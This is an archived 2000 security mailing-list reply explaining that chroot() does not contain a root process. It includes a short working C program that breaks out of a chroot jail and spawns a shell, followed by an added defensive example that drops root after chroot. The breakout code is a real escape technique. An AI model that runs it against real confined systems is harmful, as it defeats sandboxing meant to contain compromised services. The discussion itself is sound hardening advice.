Mailinglist Archive: opensuse-security (260 mails)

Re: [suse-security] dhcpd patch
  • From: Roman Drahtmueller <draht@xxxxxxx>
  • Date: Tue, 25 Jul 2000 12:25:15 +0200 (MEST)
  • Message-id: <Pine.LNX.4.21.0007251152030.11899-100000@xxxxxxxxxxxx>
> hm, the guy who wrote that patch seems not very familiar with chroot()ed
> environments. he misses the chdir() after the chroot(), which makes the
> chroot jail insecure. to be on the safe track initgroups() should be

Just a brief note, since people often tend to consider chroot() a security
feature of the kernel:

As long as a process inside a chroot()ed environment is capable of doing
chroot(2), the process will be able to break out. Executing chdir(2) after
chroot(2) doesn't really remedy this illness.

Try this: chroot(1) as root and then execute the little q+d hack
underneath my sig to break out. You might want to link it statically if
you don't have the necessary libraries around.

Note: chroot(1) does chdir("/") right after chroot(2).

> called in addition to setgid(), he also missed that. there could be more
> failures like this. if i have the time, i'll debug and test this patch...
> maybe it'll become part of our next SuSE, but I don't think so. As long as
> we have Marc's Compartment it would be wiser to use this instead of a
> buggy patch.
>
> Bye,
> Thomas


Thanks,
Roman Drahtmüller.
--
- -----------------------------------------------------------------------
| Roman Drahtmüller <draht@xxxxxxx>   "Caution: Cape does not           |
| SuSE GmbH - Security                 enable user to fly."             |
| Nürnberg, Germany                    (Batman Costume warning label)   |
- -----------------------------------------------------------------------


#include <stdio.h>
#include <stdlib.h>     /* system(), exit() */
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define CDIR "testdir"

/* Every call below succeeds only because the process is still root
   (CAP_SYS_CHROOT): a jail that keeps root keeps chroot(2) as well. */
int main() {

    int a;

    mkdir(CDIR, 0x666);
    a=open(".",O_RDONLY);
    fchdir(a);
    chroot(CDIR);
    chdir(".");
    fchdir(a);
    chdir("../../../../..");
    chroot(".");
    chdir(".");
    system("/bin/sh");
    exit(0);
}
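Added example (not part of Roman's mail or of the dhcpd patch it discusses) showing the order a daemon has to follow for the jail to hold: chroot(2), chdir("/"), then give up root for good. Once setuid() to an unprivileged user has succeeded, the chroot(2) call that the hack above relies on is refused with EPERM, which is the only thing that makes chdir() after chroot() worth anything. Assumptions: uid/gid 65534 is taken to be the unprivileged "nobody" account, setgroups(0, NULL) is used to clear supplementary groups in place of the initgroups() mentioned in the quoted mail (initgroups() needs a user name), and the jail directory is a constructed temporary one.

```c
#define _GNU_SOURCE          /* setgroups(), mkdtemp() in glibc headers */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <grp.h>
#include <sys/types.h>

/* Confine the process to dir and then permanently drop root, in this order.
 * Returns 0 on success or -errno of the first step that fails.
 * uid and gid must be non-zero: a jail that keeps root also keeps chroot(2). */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (dir == NULL || uid == 0 || gid == 0)
        return -EINVAL;
    if (chroot(dir) != 0)            /* needs CAP_SYS_CHROOT, i.e. root */
        return -errno;
    if (chdir("/") != 0)             /* cwd must move inside the new root */
        return -errno;
    if (setgroups(0, NULL) != 0)     /* clear supplementary groups (assumption:
                                        used here instead of initgroups()) */
        return -errno;
    if (setgid(gid) != 0)            /* group first, while still root */
        return -errno;
    if (setuid(uid) != 0)            /* as root this sets real, effective and saved uid */
        return -errno;
    if (setuid(0) == 0)              /* must be refused now; otherwise the drop is reversible */
        return -EPERM;
    return 0;
}

/* 1 if the calling process can still call chroot(2), 0 if it is refused.
 * chroot("/") resolves to the current root, so a success changes nothing. */
int can_still_chroot(void)
{
    return chroot("/") == 0 ? 1 : 0;
}

int main(void)
{
    char tmpl[] = "/tmp/jail.XXXXXX";   /* constructed throwaway jail directory */

    if (geteuid() != 0) {
        printf("not root: chroot(2) is already refused, can_still_chroot=%d\n",
               can_still_chroot());
        return 0;
    }
    char *jail = mkdtemp(tmpl);
    if (jail == NULL) {
        perror("mkdtemp");
        return 1;
    }
    int rc = enter_jail(jail, 65534, 65534);   /* assumption: 65534 is "nobody" */
    if (rc != 0) {
        fprintf(stderr, "enter_jail: %s\n", strerror(-rc));
        return 1;
    }
    /* Inside the jail and without root: the breakout sequence has nothing to work with. */
    printf("inside %s as uid %d, can_still_chroot=%d\n",
           jail, (int)getuid(), can_still_chroot());
    return 0;
}
```

Run as root it prints can_still_chroot=0 after enter_jail(); run as an ordinary user it only shows that chroot(2) is refused from the start. The setuid(0) check at the end of enter_jail() is the cheap self-test every daemon should keep: if it ever succeeds, the process never really left root and the chroot() is decoration.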


